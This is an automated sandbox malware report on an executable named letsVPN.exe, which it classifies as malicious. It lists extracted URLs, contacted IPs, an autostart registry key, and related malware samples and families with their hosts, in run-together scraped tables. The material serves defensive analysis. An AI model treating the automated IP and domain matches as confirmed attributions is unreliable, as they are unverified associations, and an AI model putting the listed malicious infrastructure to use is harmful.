                                                                                                                  http://wpfanimatedgif.codeplex.comletsvpn-latest.exe, 00000013.00000003.2507016219.0000000002834000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  http://logging.apache.org/log4neLetsPRO.exefalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/RenewTletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://icsharpcode.net/sharpdevelop/avalonedit#ICSharpCode.AvalonEdit.HighlightingQletsvpn-latest.exe, 00000013.00000003.2330908444.0000000002837000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://intercom.help/letsvpn-world/en/collections/1611781-%E4%B8%AD%E6%96%87%E5%B8%AE%E5%8A%A9letsvpn-latest.exe, 00000013.00000003.2541965114.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2545793260.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2543452892.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2547235737.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2546517065.000000000283B000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpfalse
                                                                                                                      high
                                                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsshttp://schemas.xmlsoap.org/ws/2005/05/idenletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifierletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000018.00000002.2664706128.0000000004AA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000018.00000002.2664706128.0000000004AA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://intercom.help/letsvpn-world/en/articles/8262801-special-settings-for-killer-network-serviceletsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpfalse
                                                                                                                                high
                                                                                                                                http://foo/bar/themes/radiobuttondictionary.bamldLetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://contoso.com/Iconpowershell.exe, 00000018.00000002.2667384092.00000000059BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://intercom.help/letsvpn-world/en/articles/8262818-%D1%81%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%Dletsvpn-latest.exe, 00000013.00000003.2533198985.000000000536F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://crl.ver)svchost.exe, 0000000C.00000002.3903723313.000001CF4D400000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://github.com/dotnetprojects/SVGImageletsvpn-latest.exe, 00000013.00000003.2382726468.0000000002835000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishedname_urn:oasis:names:tc:xacmlletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://home.pacific.net.sg/~jupbooletsVPN.exe, 00000000.00000002.2227641461.0000000140081000.00000002.00000001.01000000.00000003.sdmp, letsVPN.exe, 00000000.00000000.2037454903.0000000140081000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            https://github.com/Pester/Pesterpowershell.exe, 00000018.00000002.2664706128.0000000004AA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://rcd.video.sina.com.cn/realtime_pcdesktopsinaplayer_service.exefalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              http://defaultcontainer/LetsPRO;component/Themes/TextBoxDictionary.xamlLetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/countryletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://fontawesome.iohttp://fontawesome.io/license/Copyrightletsvpn-latest.exe, 00000013.00000003.2329176650.000000000283E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claimproperties/attributenameletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://developers.google.com/analytics/devguides/collection/protocol/ga4/user-properties?client_typLetsPRO.exe, 00000038.00000002.3996035893.0000000067F67000.00000002.00000001.01000000.0000002A.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://rcd.video.sina.com.cn/realtime_pcdesktop?app=pcClient&type=crash&clientType=0&machineCode=sinaplayer_service.exe, sinaplayer_service.exe, 00000011.00000000.2194495850.000000000039D000.00000002.00000001.01000000.0000000A.sdmp, sinaplayer_service.exe, 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://intercom.help/letsvpn-world/en/collections/1627706-%D0%BF%D0%BE%D0%BC%D0%BE%D1%89%D1%8C-%D1%letsvpn-latest.exe, 00000013.00000003.2533198985.000000000536F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000018.00000002.2664706128.0000000004AA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://intercom.help/letsvpn-world/en/articles/2780068-%E5%A6%82%E4%BD%95%E4%B8%8B%E8%BD%BD%E5%BE%9letsvpn-latest.exe, 00000013.00000003.2541965114.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2545793260.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2543452892.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2547235737.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2546517065.000000000283B000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://1wm27s.onelink.me/DPiD/s5eizipo-1letsvpn-latest.exe, 00000013.00000003.2827115920.0000000000563000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2212864980.000000000283E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCTwhttp://schemas.xmlsoap.org/ws/2005/02/trust/RSTletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://www.xmlspy.com)letsvpn-latest.exe, 00000013.00000003.2405166479.0000000002833000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://intercom.help/letsvpn-world/en/articles/2907458-%E6%8F%90%E7%A4%BA%E7%BB%91%E5%AE%9A%E8%AE%Bletsvpn-latest.exe, 00000013.00000003.2541965114.0000000002835000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2545793260.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2543452892.0000000002839000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2547235737.0000000002831000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2546517065.000000000283B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/Cancelletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Cancelletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://docs.oasis-open.org/ws-sx/ws-trust/200512/Issuelhttp://docs.oasis-open.org/ws-sx/ws-trust/200letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://icsharpcode.net/sharpdevelop/avalonedit#ICSharpCode.AvalonEdit.Highlightingletsvpn-latest.exe, 00000013.00000003.2330908444.0000000002837000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2009/09/identity/claims/actorletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://rcd.video.sina.com.cn/realtime_pcdesktop?app=pcClient&type=crash&clientType=0&machineCode=httsinaplayer_service.exe, 00000011.00000000.2194495850.000000000039D000.00000002.00000001.01000000.0000000A.sdmp, sinaplayer_service.exe, 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      http://www.winimage.com/zLibDllnetwork_changesinaplayer_service.exe, 00000011.00000000.2194495850.000000000039D000.00000002.00000001.01000000.0000000A.sdmp, sinaplayer_service.exe, 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      https://intercom.help/letsvpn-world/en/collections/1628560-help-documentsletsvpn-latest.exe, 00000013.00000003.2347509564.0000000002830000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000000.2754838930.00000000009A2000.00000002.00000001.01000000.00000018.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Validateehttp://schemas.xmlsoap.org/ws/2005/02/trusletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://icsharpcode.net/sharpdevelop/syntaxdefinition/20081Errorletsvpn-latest.exe, 00000013.00000003.2330908444.0000000002837000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://defaultcontainer/LetsPRO;component/Themes/RadioButtonDictionary.xamldLetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                            unknown
                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/ValidateTletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://foo/app.xamldLetsPRO.exe, 00000036.00000002.2774759611.00000000030D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                              unknown
                                                                                                                                                                              http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/Validateletsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
IP    Domain    Country    Flag    ASN    ASN Name    Malicious
                                                                                                                                                                                45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
                                                                                                                                                                                23.98.101.155
                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                8.217.212.245
                                                                                                                                                                                unknownSingapore
                                                                                                                                                                                45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                                                                                                                                                                                13.227.9.159
                                                                                                                                                                                d1dmgcawtbm6l9.cloudfront.netUnited States
                                                                                                                                                                                16509AMAZON-02USfalse
                                                                                                                                                                                8.223.56.120
                                                                                                                                                                                unknownSingapore
                                                                                                                                                                                45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
                                                                                                                                                                                77.88.55.88
                                                                                                                                                                                yandex.comRussian Federation
                                                                                                                                                                                13238YANDEXRUfalse
                                                                                                                                                                                172.217.21.36
                                                                                                                                                                                www.google.comUnited States
                                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                                18.136.139.158
                                                                                                                                                                                socket-ap1-ingress-1471706552.ap-southeast-1.elb.amazonaws.comUnited States
                                                                                                                                                                                16509AMAZON-02USfalse
                                                                                                                                                                                IP
                                                                                                                                                                                127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1582024
Start date and time: 2024-12-29 16:28:03 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 14m 21s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of analysed new started processes analysed: 75
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: letsVPN.exe
Detection: MAL
Classification: mal62.spre.troj.spyw.evad.winEXE@103/292@9/12
                                                                                                                                                                                EGA Information:
                                                                                                                                                                                • Successful, ratio: 71.4%
                                                                                                                                                                                HCA Information:
                                                                                                                                                                                • Successful, ratio: 67%
                                                                                                                                                                                • Number of executed functions: 24
                                                                                                                                                                                • Number of non-executed functions: 376
                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                                                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                                                                                                • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                                                                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 23.218.208.109, 4.153.25.42, 2.16.158.50, 2.16.158.75, 2.16.158.80, 2.16.158.40, 2.16.158.192, 2.16.158.26, 2.16.158.82, 2.16.158.48, 2.16.158.33, 142.250.181.46, 13.107.246.63, 4.245.163.56, 20.12.23.50
                                                                                                                                                                                • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, www-www.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, in-prod-pme-eastus2-ingestion-66ddb56a.trafficmanager.net, e86303.dscx.akamaiedge.net, ocsp.digicert.com, www.bing.com.edgekey.net, in1-gw2-04-3d6c3051.eastus2.cloudapp.azure.com, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, www.google-analytics.com
                                                                                                                                                                                • Execution Graph export aborted for target LetsPRO.exe, PID 4372 because it is empty
                                                                                                                                                                                • Execution Graph export aborted for target powershell.exe, PID 6540 because it is empty
                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
| Time | Type | Description |
|---|---|---|
| 16:30:22 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run LetsPRO "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" /silent |
| 16:30:32 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run LetsPRO "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" /silent |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| 183.60.146.66 | SBSLMD5qhm.msi | malicious | Metasploit | |
| 183.60.146.66 | KLL.exe | malicious | Unknown | |
| 183.60.146.66 | KLL.exe | malicious | Unknown | |
| 183.60.146.66 | KLL.exe | malicious | Unknown | |
| 183.60.146.66 | KLL.exe | malicious | Unknown | |
| 183.60.146.66 | KLL_1.exe | malicious | Unknown | |
| 183.60.146.66 | KLL.exe | malicious | Unknown | |
| 183.60.146.66 | KLL_1.exe | malicious | Unknown | |
| 183.60.146.66 | KLL.exe | malicious | Unknown | |
| 103.235.46.96 | VIP-#U4f1a#U5458#U7248.exe | malicious | BlackMoon | www.baidu.com/ |
| 103.235.46.96 | DNF#U604b#U62180224a.exe | malicious | Unknown | www.baidu.com/s?wd=www.cfjuzi.com&rsv_spt=1&issp=1&rsv_bp=0&ie=utf-8&tn=utf8speed_dg&inputT=453 |
| 103.235.46.96 | New Al Maktoum International Airport Enquiry Ref #2401249.exe | malicious | FormBook | www.wvufcw948o.top/pt46/?ara=runx2q514acjuuceA0OTyKdTIzcy0YcAOvUMICEfyLgC3vUfTcW2aWKxfLyo5+IB4FDn&D8V=_FNDAz |
| 103.235.46.96 | 4.exe | malicious | BlackMoon | www.baidu.com/ |
| 103.235.46.96 | 2.exe | malicious | BlackMoon | www.baidu.com/ |
| 103.235.46.96 | 1.exe | malicious | BlackMoon | www.baidu.com/ |
| 103.235.46.96 | 3.exe | malicious | BlackMoon, XRed | www.baidu.com/ |
| 103.235.46.96 | 1.exe | malicious | BlackMoon | www.baidu.com/ |
| 103.235.46.96 | f1.exe | malicious | Unknown | www.baidu.com/ |
| 103.235.46.96 | SecuriteInfo.com.FileRepMalware.29184.31872.exe | malicious | Unknown | www.baidu.com/ |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| www.wshifen.com | Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnk | malicious | Unknown | 103.235.47.188 |
| www.wshifen.com | 2024-12-10#U67e5#U9605_uninst.exe | malicious | ValleyRAT | 103.235.47.188 |
| www.wshifen.com | 2024-12-10#U67e5#U9605_uninst.exe | malicious | ValleyRAT | 103.235.47.188 |
| www.wshifen.com | Setup.exe | malicious | LummaC Stealer | 103.235.47.188 |
| www.wshifen.com | b6FArHy7yA.exe | malicious | LummaC Stealer | 103.235.47.188 |
| www.wshifen.com | VIP-#U4f1a#U5458#U7248.exe | malicious | BlackMoon | 103.235.46.96 |
| www.wshifen.com | 360safe.exe | malicious | Unknown | 103.235.47.188 |
| www.wshifen.com | XiaobingOnekey.exe | malicious | Unknown | 103.235.46.96 |
| www.wshifen.com | DNF#U604b#U62180224a.exe | malicious | Unknown | 103.235.46.96 |
| socket-ap1-ingress-1471706552.ap-southeast-1.elb.amazonaws.com | SBSLMD5qhm.msi | malicious | Metasploit | 18.139.76.7 |
| socket-ap1-ingress-1471706552.ap-southeast-1.elb.amazonaws.com | KLL.exe | malicious | Unknown | 18.140.92.167 |
| socket-ap1-ingress-1471706552.ap-southeast-1.elb.amazonaws.com | KLL.exe | malicious | Unknown | 18.139.183.38 |
| socket-ap1-ingress-1471706552.ap-southeast-1.elb.amazonaws.com | KLL.exe | malicious | Unknown | 54.251.31.103 |
| socket-ap1-ingress-1471706552.ap-southeast-1.elb.amazonaws.com | KLL.exe | malicious | Unknown | 18.139.183.38 |
                                                                                                                                                                                                  KLL_1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 18.139.169.84
                                                                                                                                                                                                  KLL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 18.139.183.38
                                                                                                                                                                                                  KLL_1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 18.136.78.90
                                                                                                                                                                                                  KLL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 18.136.78.90
                                                                                                                                                                                                  d1dmgcawtbm6l9.cloudfront.netSBSLMD5qhm.msiGet hashmaliciousMetasploitBrowse
                                                                                                                                                                                                  • 108.138.24.227
                                                                                                                                                                                                  KLL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 18.239.15.26
                                                                                                                                                                                                  KLL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 18.239.15.216
                                                                                                                                                                                                  KLL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 108.138.187.72
                                                                                                                                                                                                  KLL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 18.239.15.44
                                                                                                                                                                                                  KLL_1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 108.138.24.182
                                                                                                                                                                                                  KLL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 108.138.24.227
                                                                                                                                                                                                  KLL_1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 108.138.24.115
                                                                                                                                                                                                  KLL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 108.138.24.115
                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                  CT-DONGGUAN-IDCCHINANETGuangdongprovincenetworkCNsplsh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 14.17.77.142
                                                                                                                                                                                                  xobftuootu.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 183.61.188.99
                                                                                                                                                                                                  sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                  • 211.99.125.149
                                                                                                                                                                                                  owari.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 211.102.80.218
                                                                                                                                                                                                  jklarm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 183.6.228.171
                                                                                                                                                                                                  j2qv9oE81X.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                  • 59.38.96.207
                                                                                                                                                                                                  db0fa4b8db0333367e9bda3ab68b8042.x86.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                                                                  • 14.17.91.101
                                                                                                                                                                                                  05KN0c1P2J.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                  • 14.17.91.116
                                                                                                                                                                                                  SBSLMD5qhm.msiGet hashmaliciousMetasploitBrowse
                                                                                                                                                                                                  • 183.60.146.66
                                                                                                                                                                                                  CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCT1#U52a9#U624b1.0.1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 8.212.101.195
                                                                                                                                                                                                  T1#U52a9#U624b1.0.1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 8.212.101.195
                                                                                                                                                                                                  wyySetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                                                                                  • 149.129.12.34
                                                                                                                                                                                                  V2clgnyM2J.exeGet hashmaliciousGhostRatBrowse
                                                                                                                                                                                                  • 8.218.163.85
                                                                                                                                                                                                  test5.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                                                                                                                                  • 47.90.135.102
                                                                                                                                                                                                  libcurl.dllGet hashmaliciousMatanbuchusBrowse
                                                                                                                                                                                                  • 47.254.174.185
                                                                                                                                                                                                  EpCAySF1G6.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 8.218.163.62
                                                                                                                                                                                                  EpCAySF1G6.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 8.218.163.62
                                                                                                                                                                                                  xd.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                  • 47.245.158.74
                                                                                                                                                                                                  BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtddb0fa4b8db0333367e9bda3ab68b8042.m68k.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                                                                  • 106.13.224.246
                                                                                                                                                                                                  arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                  • 119.75.215.154
                                                                                                                                                                                                  nsharm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                  • 182.61.224.140
                                                                                                                                                                                                  3.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 182.61.224.138
                                                                                                                                                                                                  Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 103.235.47.188
                                                                                                                                                                                                  elitebotnet.sh4.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                  • 180.76.189.193
                                                                                                                                                                                                  2024-12-10#U67e5#U9605_uninst.exeGet hashmaliciousValleyRATBrowse
                                                                                                                                                                                                  • 103.235.47.188
                                                                                                                                                                                                  2024-12-10#U67e5#U9605_uninst.exeGet hashmaliciousValleyRATBrowse
                                                                                                                                                                                                  • 103.235.47.188
                                                                                                                                                                                                  hax.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                  • 182.61.224.158
                                                                                                                                                                                                  MICROSOFT-CORP-MSN-AS-BLOCKUSsparc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 52.150.237.12
                                                                                                                                                                                                  mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 52.150.237.12
                                                                                                                                                                                                  sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 52.150.237.12
                                                                                                                                                                                                  arm7.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 52.150.237.12
                                                                                                                                                                                                  mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 52.150.237.12
                                                                                                                                                                                                  arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 52.150.237.12
                                                                                                                                                                                                  arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 52.150.237.12
                                                                                                                                                                                                  x86_64.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • 52.150.237.12
                                                                                                                                                                                                  Tool_Unlock_v1.2.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                  • 204.79.197.219
                                                                                                                                                                                                  No context
                                                                                                                                                                                                  No context
Process: C:\ProgramData\letsvpn-latest.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 318
Entropy (8bit): 4.740682303463164
Encrypted: false
